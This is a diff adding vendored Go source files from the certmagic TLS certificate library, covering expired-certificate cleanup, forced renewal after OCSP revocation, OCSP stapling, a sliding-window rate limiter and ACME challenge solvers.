if expiredTime := time.Since(cert.NotAfter); expiredTime >= gracePeriod {
|
||||
log.Printf("[INFO] Certificate %s expired %s ago; cleaning up", assetKey, expiredTime)
|
||||
baseName := strings.TrimSuffix(assetKey, ".crt")
|
||||
for _, relatedAsset := range []string{
|
||||
assetKey,
|
||||
baseName + ".key",
|
||||
baseName + ".json",
|
||||
} {
|
||||
log.Printf("[INFO] Deleting %s because resource expired", relatedAsset)
|
||||
err := storage.Delete(ctx, relatedAsset)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Cleaning up asset related to expired certificate for %s: %s: %v",
|
||||
baseName, relatedAsset, err)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// update listing; if folder is empty, delete it
|
||||
siteAssets, err = storage.List(ctx, siteKey, false)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
if len(siteAssets) == 0 {
|
||||
log.Printf("[INFO] Deleting %s because key is empty", siteKey)
|
||||
err := storage.Delete(ctx, siteKey)
|
||||
if err != nil {
|
||||
return fmt.Errorf("deleting empty site folder %s: %v", siteKey, err)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// forceRenew forcefully renews cert and replaces it in the cache, and returns the new certificate. It is intended
|
||||
// for use primarily in the case of cert revocation. This MUST NOT be called within a lock on cfg.certCacheMu.
|
||||
func (cfg *Config) forceRenew(ctx context.Context, logger *zap.Logger, cert Certificate) (Certificate, error) {
|
||||
if logger != nil {
|
||||
if cert.ocsp != nil && cert.ocsp.Status == ocsp.Revoked {
|
||||
logger.Warn("OCSP status for managed certificate is REVOKED; attempting to replace with new certificate",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter))
|
||||
} else {
|
||||
logger.Warn("forcefully renewing certificate",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter))
|
||||
}
|
||||
}
|
||||
|
||||
renewName := cert.Names[0]
|
||||
|
||||
// if revoked for key compromise, we can't be sure whether the storage of
|
||||
// the key is still safe; however, we KNOW the old key is not safe, and we
|
||||
// can only hope by the time of revocation that storage has been secured;
|
||||
// key management is not something we want to get into, but in this case
|
||||
// it seems prudent to replace the key - and since renewal requires reuse
|
||||
// of a prior key, we can't do a "renew" to replace the cert if we need a
|
||||
// new key, so we'll have to do an obtain instead
|
||||
var obtainInsteadOfRenew bool
|
||||
if cert.ocsp != nil && cert.ocsp.RevocationReason == acme.ReasonKeyCompromise {
|
||||
err := cfg.moveCompromisedPrivateKey(ctx, cert, logger)
|
||||
if err != nil && logger != nil {
|
||||
logger.Error("could not remove compromised private key from use",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.String("issuer", cert.issuerKey),
|
||||
zap.Error(err))
|
||||
}
|
||||
obtainInsteadOfRenew = true
|
||||
}
|
||||
|
||||
var err error
|
||||
if obtainInsteadOfRenew {
|
||||
err = cfg.ObtainCertAsync(ctx, renewName)
|
||||
} else {
|
||||
// notice that we force renewal; otherwise, it might see that the
|
||||
// certificate isn't close to expiring and return, but we really
|
||||
// need a replacement certificate! see issue #4191
|
||||
err = cfg.RenewCertAsync(ctx, renewName, true)
|
||||
}
|
||||
if err != nil {
|
||||
if cert.ocsp != nil && cert.ocsp.Status == ocsp.Revoked {
|
||||
// probably better to not serve a revoked certificate at all
|
||||
if logger != nil {
|
||||
logger.Error("unable to obtain new to certificate after OCSP status of REVOKED; removing from cache",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Error(err))
|
||||
}
|
||||
cfg.certCache.mu.Lock()
|
||||
cfg.certCache.removeCertificate(cert)
|
||||
cfg.certCache.mu.Unlock()
|
||||
}
|
||||
return cert, fmt.Errorf("unable to forcefully get new certificate for %v: %w", cert.Names, err)
|
||||
}
|
||||
|
||||
return cfg.reloadManagedCertificate(ctx, cert)
|
||||
}
|
||||
|
||||
// moveCompromisedPrivateKey moves the private key for cert to a ".compromised" file
|
||||
// by copying the data to the new file, then deleting the old one.
|
||||
func (cfg *Config) moveCompromisedPrivateKey(ctx context.Context, cert Certificate, logger *zap.Logger) error {
|
||||
privKeyStorageKey := StorageKeys.SitePrivateKey(cert.issuerKey, cert.Names[0])
|
||||
|
||||
privKeyPEM, err := cfg.Storage.Load(ctx, privKeyStorageKey)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
compromisedPrivKeyStorageKey := privKeyStorageKey + ".compromised"
|
||||
err = cfg.Storage.Store(ctx, compromisedPrivKeyStorageKey, privKeyPEM)
|
||||
if err != nil {
|
||||
// better safe than sorry: as a last resort, try deleting the key so it won't be reused
|
||||
cfg.Storage.Delete(ctx, privKeyStorageKey)
|
||||
return err
|
||||
}
|
||||
|
||||
err = cfg.Storage.Delete(ctx, privKeyStorageKey)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
logger.Info("removed certificate's compromised private key from use",
|
||||
zap.String("storage_path", compromisedPrivKeyStorageKey),
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.String("issuer", cert.issuerKey))
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// certShouldBeForceRenewed returns true if cert should be forcefully renewed
|
||||
// (like if it is revoked according to its OCSP response).
|
||||
func certShouldBeForceRenewed(cert Certificate) bool {
|
||||
return cert.managed &&
|
||||
len(cert.Names) > 0 &&
|
||||
cert.ocsp != nil &&
|
||||
cert.ocsp.Status == ocsp.Revoked
|
||||
}
|
||||
|
||||
const (
|
||||
// DefaultRenewCheckInterval is how often to check certificates for expiration.
|
||||
// Scans are very lightweight, so this can be semi-frequent. This default should
|
||||
// be smaller than <Minimum Cert Lifetime>*DefaultRenewalWindowRatio/3, which
|
||||
// gives certificates plenty of chance to be renewed on time.
|
||||
DefaultRenewCheckInterval = 10 * time.Minute
|
||||
|
||||
// DefaultRenewalWindowRatio is how much of a certificate's lifetime becomes the
|
||||
// renewal window. The renewal window is the span of time at the end of the
|
||||
// certificate's validity period in which it should be renewed. A default value
|
||||
// of ~1/3 is pretty safe and recommended for most certificates.
|
||||
DefaultRenewalWindowRatio = 1.0 / 3.0
|
||||
|
||||
// DefaultOCSPCheckInterval is how often to check if OCSP stapling needs updating.
|
||||
DefaultOCSPCheckInterval = 1 * time.Hour
|
||||
)
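A worked sketch of how these defaults interact for a hypothetical 90-day certificate: with a renewal-window ratio of 1/3, renewal becomes due during the final 30 days, and a 10-minute check interval scans that window thousands of times.

package main

import (
	"fmt"
	"time"
)

func main() {
	const renewalWindowRatio = 1.0 / 3.0 // mirrors DefaultRenewalWindowRatio
	lifetime := 90 * 24 * time.Hour      // hypothetical certificate lifetime
	window := time.Duration(float64(lifetime) * renewalWindowRatio)
	notAfter := time.Now().Add(lifetime)

	fmt.Println("renewal window:", window)                  // 720h0m0s (30 days)
	fmt.Println("renewal due from:", notAfter.Add(-window)) // the last third of the lifetime
	fmt.Println("checks per window:", int(window/(10*time.Minute)))
}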
|
233
vendor/github.com/caddyserver/certmagic/ocsp.go
generated
vendored
Normal file
@ -0,0 +1,233 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"crypto/x509"
|
||||
"encoding/pem"
|
||||
"fmt"
|
||||
"io"
|
||||
"log"
|
||||
"net/http"
|
||||
"time"
|
||||
|
||||
"golang.org/x/crypto/ocsp"
|
||||
)
|
||||
|
||||
// stapleOCSP staples OCSP information to cert for hostname name.
|
||||
// If you have it handy, you should pass in the PEM-encoded certificate
|
||||
// bundle; otherwise the DER-encoded cert will have to be PEM-encoded.
|
||||
// If you don't have the PEM blocks already, just pass in nil.
|
||||
//
|
||||
// If successful, the OCSP response will be set to cert's ocsp field,
|
||||
// regardless of the OCSP status. It is only stapled, however, if the
|
||||
// status is Good.
|
||||
//
|
||||
// Errors here are not necessarily fatal, it could just be that the
|
||||
// certificate doesn't have an issuer URL.
|
||||
func stapleOCSP(ctx context.Context, ocspConfig OCSPConfig, storage Storage, cert *Certificate, pemBundle []byte) error {
|
||||
if ocspConfig.DisableStapling {
|
||||
return nil
|
||||
}
|
||||
|
||||
if pemBundle == nil {
|
||||
// we need a PEM encoding only for some function calls below
|
||||
bundle := new(bytes.Buffer)
|
||||
for _, derBytes := range cert.Certificate.Certificate {
|
||||
pem.Encode(bundle, &pem.Block{Type: "CERTIFICATE", Bytes: derBytes})
|
||||
}
|
||||
pemBundle = bundle.Bytes()
|
||||
}
|
||||
|
||||
var ocspBytes []byte
|
||||
var ocspResp *ocsp.Response
|
||||
var ocspErr error
|
||||
var gotNewOCSP bool
|
||||
|
||||
// First try to load OCSP staple from storage and see if
|
||||
// we can still use it.
|
||||
ocspStapleKey := StorageKeys.OCSPStaple(cert, pemBundle)
|
||||
cachedOCSP, err := storage.Load(ctx, ocspStapleKey)
|
||||
if err == nil {
|
||||
resp, err := ocsp.ParseResponse(cachedOCSP, nil)
|
||||
if err == nil {
|
||||
if freshOCSP(resp) {
|
||||
// staple is still fresh; use it
|
||||
ocspBytes = cachedOCSP
|
||||
ocspResp = resp
|
||||
}
|
||||
} else {
|
||||
// invalid contents; delete the file
|
||||
// (we do this independently of the maintenance routine because
|
||||
// in this case we know for sure this should be a staple file
|
||||
// because we loaded it by name, whereas the maintenance routine
|
||||
// just iterates the list of files, even if somehow a non-staple
|
||||
// file gets in the folder. in this case we are sure it is corrupt.)
|
||||
err := storage.Delete(ctx, ocspStapleKey)
|
||||
if err != nil {
|
||||
log.Printf("[WARNING] Unable to delete invalid OCSP staple file: %v", err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// If we couldn't get a fresh staple by reading the cache,
|
||||
// then we need to request it from the OCSP responder
|
||||
if ocspResp == nil || len(ocspBytes) == 0 {
|
||||
ocspBytes, ocspResp, ocspErr = getOCSPForCert(ocspConfig, pemBundle)
|
||||
if ocspErr != nil {
|
||||
// An error here is not a problem because a certificate may simply
|
||||
// not contain a link to an OCSP server. But we should log it anyway.
|
||||
// There's nothing else we can do to get OCSP for this certificate,
|
||||
// so we can return here with the error.
|
||||
return fmt.Errorf("no OCSP stapling for %v: %v", cert.Names, ocspErr)
|
||||
}
|
||||
gotNewOCSP = true
|
||||
}
|
||||
|
||||
if ocspResp.NextUpdate.After(cert.Leaf.NotAfter) {
|
||||
// uh oh, this OCSP response expires AFTER the certificate does, that's kinda bogus.
|
||||
// it was the reason a lot of Symantec-validated sites (not Caddy) went down
|
||||
// in October 2017. https://twitter.com/mattiasgeniar/status/919432824708648961
|
||||
return fmt.Errorf("invalid: OCSP response for %v valid after certificate expiration (%s)",
|
||||
cert.Names, cert.Leaf.NotAfter.Sub(ocspResp.NextUpdate))
|
||||
}
|
||||
|
||||
// Attach the latest OCSP response to the certificate; this is NOT the same
|
||||
// as stapling it, which we do below only if the status is Good, but it is
|
||||
// useful to keep with the cert in order to act on it later (like if Revoked).
|
||||
cert.ocsp = ocspResp
|
||||
|
||||
// If the response is good, staple it to the certificate. If the OCSP
|
||||
// response was not loaded from storage, we persist it for next time.
|
||||
if ocspResp.Status == ocsp.Good {
|
||||
cert.Certificate.OCSPStaple = ocspBytes
|
||||
if gotNewOCSP {
|
||||
err := storage.Store(ctx, ocspStapleKey, ocspBytes)
|
||||
if err != nil {
|
||||
return fmt.Errorf("unable to write OCSP staple file for %v: %v", cert.Names, err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// getOCSPForCert takes a PEM encoded cert or cert bundle returning the raw OCSP response,
|
||||
// the parsed response, and an error, if any. The returned []byte can be passed directly
|
||||
// into the OCSPStaple property of a tls.Certificate. If the bundle only contains the
|
||||
// issued certificate, this function will try to get the issuer certificate from the
|
||||
// IssuingCertificateURL in the certificate. If the []byte and/or ocsp.Response return
|
||||
// values are nil, the OCSP status may be assumed OCSPUnknown.
|
||||
//
|
||||
// Borrowed from xenolf.
|
||||
func getOCSPForCert(ocspConfig OCSPConfig, bundle []byte) ([]byte, *ocsp.Response, error) {
|
||||
// TODO: Perhaps this should be synchronized too, with a Locker?
|
||||
|
||||
certificates, err := parseCertsFromPEMBundle(bundle)
|
||||
if err != nil {
|
||||
return nil, nil, err
|
||||
}
|
||||
|
||||
// We expect the certificate slice to be ordered downwards the chain.
|
||||
// SRV CRT -> CA. We need to pull the leaf and issuer certs out of it,
|
||||
// which should always be the first two certificates. If there's no
|
||||
// OCSP server listed in the leaf cert, there's nothing to do. And if
|
||||
// we have only one certificate so far, we need to get the issuer cert.
|
||||
issuedCert := certificates[0]
|
||||
if len(issuedCert.OCSPServer) == 0 {
|
||||
return nil, nil, fmt.Errorf("no OCSP server specified in certificate")
|
||||
}
|
||||
|
||||
// apply override for responder URL
|
||||
respURL := issuedCert.OCSPServer[0]
|
||||
if len(ocspConfig.ResponderOverrides) > 0 {
|
||||
if override, ok := ocspConfig.ResponderOverrides[respURL]; ok {
|
||||
respURL = override
|
||||
}
|
||||
}
|
||||
if respURL == "" {
|
||||
return nil, nil, fmt.Errorf("override disables querying OCSP responder: %v", issuedCert.OCSPServer[0])
|
||||
}
|
||||
|
||||
if len(certificates) == 1 {
|
||||
if len(issuedCert.IssuingCertificateURL) == 0 {
|
||||
return nil, nil, fmt.Errorf("no URL to issuing certificate")
|
||||
}
|
||||
|
||||
resp, err := http.Get(issuedCert.IssuingCertificateURL[0])
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("getting issuer certificate: %v", err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
issuerBytes, err := io.ReadAll(io.LimitReader(resp.Body, 1024*1024))
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("reading issuer certificate: %v", err)
|
||||
}
|
||||
|
||||
issuerCert, err := x509.ParseCertificate(issuerBytes)
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("parsing issuer certificate: %v", err)
|
||||
}
|
||||
|
||||
// append the issuer certificate to the chain;
|
||||
// we want it ordered leaf (SRV CRT) -> CA
|
||||
certificates = append(certificates, issuerCert)
|
||||
}
|
||||
|
||||
issuerCert := certificates[1]
|
||||
|
||||
ocspReq, err := ocsp.CreateRequest(issuedCert, issuerCert, nil)
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("creating OCSP request: %v", err)
|
||||
}
|
||||
|
||||
reader := bytes.NewReader(ocspReq)
|
||||
req, err := http.Post(respURL, "application/ocsp-request", reader)
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("making OCSP request: %v", err)
|
||||
}
|
||||
defer req.Body.Close()
|
||||
|
||||
ocspResBytes, err := io.ReadAll(io.LimitReader(req.Body, 1024*1024))
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("reading OCSP response: %v", err)
|
||||
}
|
||||
|
||||
ocspRes, err := ocsp.ParseResponse(ocspResBytes, issuerCert)
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("parsing OCSP response: %v", err)
|
||||
}
|
||||
|
||||
return ocspResBytes, ocspRes, nil
|
||||
}
|
||||
|
||||
// freshOCSP returns true if resp is still fresh,
|
||||
// meaning that it is not expedient to get an
|
||||
// updated response from the OCSP server.
|
||||
func freshOCSP(resp *ocsp.Response) bool {
|
||||
nextUpdate := resp.NextUpdate
|
||||
// If there is an OCSP responder certificate, and it expires before the
|
||||
// OCSP response, use its expiration date as the end of the OCSP
|
||||
// response's validity period.
|
||||
if resp.Certificate != nil && resp.Certificate.NotAfter.Before(nextUpdate) {
|
||||
nextUpdate = resp.Certificate.NotAfter
|
||||
}
|
||||
// start checking OCSP staple about halfway through validity period for good measure
|
||||
refreshTime := resp.ThisUpdate.Add(nextUpdate.Sub(resp.ThisUpdate) / 2)
|
||||
return time.Now().Before(refreshTime)
|
||||
}
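A worked sketch of the halfway rule above: a staple whose validity window spans 7 days is considered fresh only for the first 3.5 days, after which the maintenance routine will fetch a new response. The window length is hypothetical.

package main

import (
	"fmt"
	"time"
)

func main() {
	thisUpdate := time.Now()
	nextUpdate := thisUpdate.Add(7 * 24 * time.Hour) // hypothetical OCSP validity window
	refreshTime := thisUpdate.Add(nextUpdate.Sub(thisUpdate) / 2)
	fmt.Println("staple treated as fresh until:", refreshTime) // ~3.5 days after thisUpdate
}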
|
243
vendor/github.com/caddyserver/certmagic/ratelimiter.go
generated
vendored
Normal file
@ -0,0 +1,243 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"log"
|
||||
"runtime"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
// NewRateLimiter returns a rate limiter that allows up to maxEvents
|
||||
// in a sliding window of size window. If maxEvents and window are
|
||||
// both 0, or if maxEvents is non-zero and window is 0, rate limiting
|
||||
// is disabled. This function panics if maxEvents is less than 0 or
|
||||
// if maxEvents is 0 and window is non-zero, which is considered to be
|
||||
// an invalid configuration, as it would never allow events.
|
||||
func NewRateLimiter(maxEvents int, window time.Duration) *RingBufferRateLimiter {
|
||||
if maxEvents < 0 {
|
||||
panic("maxEvents cannot be less than zero")
|
||||
}
|
||||
if maxEvents == 0 && window != 0 {
|
||||
panic("invalid configuration: maxEvents = 0 and window != 0 would not allow any events")
|
||||
}
|
||||
rbrl := &RingBufferRateLimiter{
|
||||
window: window,
|
||||
ring: make([]time.Time, maxEvents),
|
||||
started: make(chan struct{}),
|
||||
stopped: make(chan struct{}),
|
||||
ticket: make(chan struct{}),
|
||||
}
|
||||
go rbrl.loop()
|
||||
<-rbrl.started // make sure loop is ready to receive before we return
|
||||
return rbrl
|
||||
}
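A minimal usage sketch of this rate limiter, allowing at most 10 events per sliding minute; the limits and the timeout are illustrative only.

package main

import (
	"context"
	"fmt"
	"time"

	"github.com/caddyserver/certmagic"
)

func main() {
	rl := certmagic.NewRateLimiter(10, time.Minute) // at most 10 events per sliding minute
	defer rl.Stop()

	if rl.Allow() {
		fmt.Println("event permitted without waiting")
	}

	// Block for up to 5 seconds waiting for the next permitted event.
	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
	defer cancel()
	if err := rl.Wait(ctx); err != nil {
		fmt.Println("gave up waiting:", err)
	}
}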
|
||||
|
||||
// RingBufferRateLimiter uses a ring to enforce rate limits
|
||||
// consisting of a maximum number of events within a single
|
||||
// sliding window of a given duration. An empty value is
|
||||
// not valid; use NewRateLimiter to get one.
|
||||
type RingBufferRateLimiter struct {
|
||||
window time.Duration
|
||||
ring []time.Time // maxEvents == len(ring)
|
||||
cursor int // always points to the oldest timestamp
|
||||
mu sync.Mutex // protects ring, cursor, and window
|
||||
started chan struct{}
|
||||
stopped chan struct{}
|
||||
ticket chan struct{}
|
||||
}
|
||||
|
||||
// Stop cleans up r's scheduling goroutine.
|
||||
func (r *RingBufferRateLimiter) Stop() {
|
||||
close(r.stopped)
|
||||
}
|
||||
|
||||
func (r *RingBufferRateLimiter) loop() {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
log.Printf("panic: ring buffer rate limiter: %v\n%s", err, buf)
|
||||
}
|
||||
}()
|
||||
|
||||
for {
|
||||
// if we've been stopped, return
|
||||
select {
|
||||
case <-r.stopped:
|
||||
return
|
||||
default:
|
||||
}
|
||||
|
||||
if len(r.ring) == 0 {
|
||||
if r.window == 0 {
|
||||
// rate limiting is disabled; always allow immediately
|
||||
r.permit()
|
||||
continue
|
||||
}
|
||||
panic("invalid configuration: maxEvents = 0 and window != 0 does not allow any events")
|
||||
}
|
||||
|
||||
// wait until next slot is available or until we've been stopped
|
||||
r.mu.Lock()
|
||||
then := r.ring[r.cursor].Add(r.window)
|
||||
r.mu.Unlock()
|
||||
waitDuration := time.Until(then)
|
||||
waitTimer := time.NewTimer(waitDuration)
|
||||
select {
|
||||
case <-waitTimer.C:
|
||||
r.permit()
|
||||
case <-r.stopped:
|
||||
waitTimer.Stop()
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Allow returns true if the event is allowed to
|
||||
// happen right now. It does not wait. If the event
|
||||
// is allowed, a ticket is claimed.
|
||||
func (r *RingBufferRateLimiter) Allow() bool {
|
||||
select {
|
||||
case <-r.ticket:
|
||||
return true
|
||||
default:
|
||||
return false
|
||||
}
|
||||
}
|
||||
|
||||
// Wait blocks until the event is allowed to occur. It returns an
|
||||
// error if the context is cancelled.
|
||||
func (r *RingBufferRateLimiter) Wait(ctx context.Context) error {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return context.Canceled
|
||||
case <-r.ticket:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
// MaxEvents returns the maximum number of events that
|
||||
// are allowed within the sliding window.
|
||||
func (r *RingBufferRateLimiter) MaxEvents() int {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
return len(r.ring)
|
||||
}
|
||||
|
||||
// SetMaxEvents changes the maximum number of events that are
|
||||
// allowed in the sliding window. If the new limit is lower,
|
||||
// the oldest events will be forgotten. If the new limit is
|
||||
// higher, the window will suddenly have capacity for new
|
||||
// reservations. It panics if maxEvents is 0 and window size
|
||||
// is not zero.
|
||||
func (r *RingBufferRateLimiter) SetMaxEvents(maxEvents int) {
|
||||
newRing := make([]time.Time, maxEvents)
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
|
||||
if r.window != 0 && maxEvents == 0 {
|
||||
panic("invalid configuration: maxEvents = 0 and window != 0 would not allow any events")
|
||||
}
|
||||
|
||||
// only make the change if the new limit is different
|
||||
if maxEvents == len(r.ring) {
|
||||
return
|
||||
}
|
||||
|
||||
// the new ring may be smaller; fast-forward to the
|
||||
// oldest timestamp that will be kept in the new
|
||||
// ring so the oldest ones are forgotten and the
|
||||
// newest ones will be remembered
|
||||
sizeDiff := len(r.ring) - maxEvents
|
||||
for i := 0; i < sizeDiff; i++ {
|
||||
r.advance()
|
||||
}
|
||||
|
||||
if len(r.ring) > 0 {
|
||||
// copy timestamps into the new ring until we
|
||||
// have either copied all of them or have reached
|
||||
// the capacity of the new ring
|
||||
startCursor := r.cursor
|
||||
for i := 0; i < len(newRing); i++ {
|
||||
newRing[i] = r.ring[r.cursor]
|
||||
r.advance()
|
||||
if r.cursor == startCursor {
|
||||
// new ring is larger than old one;
|
||||
// "we've come full circle"
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
r.ring = newRing
|
||||
r.cursor = 0
|
||||
}
|
||||
|
||||
// Window returns the size of the sliding window.
|
||||
func (r *RingBufferRateLimiter) Window() time.Duration {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
return r.window
|
||||
}
|
||||
|
||||
// SetWindow changes r's sliding window duration to window.
|
||||
// Goroutines that are already blocked on a call to Wait()
|
||||
// will not be affected. It panics if window is non-zero
|
||||
// but the max event limit is 0.
|
||||
func (r *RingBufferRateLimiter) SetWindow(window time.Duration) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
if window != 0 && len(r.ring) == 0 {
|
||||
panic("invalid configuration: maxEvents = 0 and window != 0 would not allow any events")
|
||||
}
|
||||
r.window = window
|
||||
}
|
||||
|
||||
// permit allows one event through the throttle. This method
|
||||
// blocks until a goroutine is waiting for a ticket or until
|
||||
// the rate limiter is stopped.
|
||||
func (r *RingBufferRateLimiter) permit() {
|
||||
for {
|
||||
select {
|
||||
case r.started <- struct{}{}:
|
||||
// notify parent goroutine that we've started; should
|
||||
// only happen once, before constructor returns
|
||||
continue
|
||||
case <-r.stopped:
|
||||
return
|
||||
case r.ticket <- struct{}{}:
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
if len(r.ring) > 0 {
|
||||
r.ring[r.cursor] = time.Now()
|
||||
r.advance()
|
||||
}
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// advance moves the cursor to the next position.
|
||||
// It is NOT safe for concurrent use, so it must
|
||||
// be called inside a lock on r.mu.
|
||||
func (r *RingBufferRateLimiter) advance() {
|
||||
r.cursor++
|
||||
if r.cursor >= len(r.ring) {
|
||||
r.cursor = 0
|
||||
}
|
||||
}
|
724
vendor/github.com/caddyserver/certmagic/solvers.go
generated
vendored
Normal file
@ -0,0 +1,724 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/tls"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"log"
|
||||
"net"
|
||||
"net/http"
|
||||
"path"
|
||||
"runtime"
|
||||
"strings"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
|
||||
"github.com/libdns/libdns"
|
||||
"github.com/mholt/acmez"
|
||||
"github.com/mholt/acmez/acme"
|
||||
"github.com/miekg/dns"
|
||||
)
|
||||
|
||||
// httpSolver solves the HTTP challenge. It must be
|
||||
// associated with a config and an address to use
|
||||
// for solving the challenge. If multiple httpSolvers
|
||||
// are initialized concurrently, the first one to
|
||||
// begin will start the server, and the last one to
|
||||
// finish will stop the server. This solver must be
|
||||
// wrapped by a distributedSolver to work properly,
|
||||
// because the only way the HTTP challenge handler
|
||||
// can access the keyAuth material is by loading it
|
||||
// from storage, which is done by distributedSolver.
|
||||
type httpSolver struct {
|
||||
closed int32 // accessed atomically
|
||||
acmeIssuer *ACMEIssuer
|
||||
address string
|
||||
}
|
||||
|
||||
// Present starts an HTTP server if none is already listening on s.address.
|
||||
func (s *httpSolver) Present(ctx context.Context, _ acme.Challenge) error {
|
||||
solversMu.Lock()
|
||||
defer solversMu.Unlock()
|
||||
|
||||
si := getSolverInfo(s.address)
|
||||
si.count++
|
||||
if si.listener != nil {
|
||||
return nil // already being served by us
|
||||
}
|
||||
|
||||
// notice the unusual error handling here; we
|
||||
// only continue to start a challenge server if
|
||||
// we got a listener; in all other cases return
|
||||
ln, err := robustTryListen(s.address)
|
||||
if ln == nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// successfully bound socket, so save listener and start key auth HTTP server
|
||||
si.listener = ln
|
||||
go s.serve(ctx, si)
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// serve is an HTTP server that serves only HTTP challenge responses.
|
||||
func (s *httpSolver) serve(ctx context.Context, si *solverInfo) {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
log.Printf("panic: http solver server: %v\n%s", err, buf)
|
||||
}
|
||||
}()
|
||||
defer close(si.done)
|
||||
httpServer := &http.Server{
|
||||
Handler: s.acmeIssuer.HTTPChallengeHandler(http.NewServeMux()),
|
||||
BaseContext: func(listener net.Listener) context.Context { return ctx },
|
||||
}
|
||||
httpServer.SetKeepAlivesEnabled(false)
|
||||
err := httpServer.Serve(si.listener)
|
||||
if err != nil && atomic.LoadInt32(&s.closed) != 1 {
|
||||
log.Printf("[ERROR] key auth HTTP server: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// CleanUp cleans up the HTTP server if it is the last one to finish.
|
||||
func (s *httpSolver) CleanUp(ctx context.Context, _ acme.Challenge) error {
|
||||
solversMu.Lock()
|
||||
defer solversMu.Unlock()
|
||||
si := getSolverInfo(s.address)
|
||||
si.count--
|
||||
if si.count == 0 {
|
||||
// last one out turns off the lights
|
||||
atomic.StoreInt32(&s.closed, 1)
|
||||
if si.listener != nil {
|
||||
si.listener.Close()
|
||||
<-si.done
|
||||
}
|
||||
delete(solvers, s.address)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// tlsALPNSolver is a type that can solve TLS-ALPN challenges.
|
||||
// It must have an associated config and address on which to
|
||||
// serve the challenge.
|
||||
type tlsALPNSolver struct {
|
||||
config *Config
|
||||
address string
|
||||
}
|
||||
|
||||
// Present adds the certificate to the certificate cache and, if
|
||||
// needed, starts a TLS server for answering TLS-ALPN challenges.
|
||||
func (s *tlsALPNSolver) Present(ctx context.Context, chal acme.Challenge) error {
|
||||
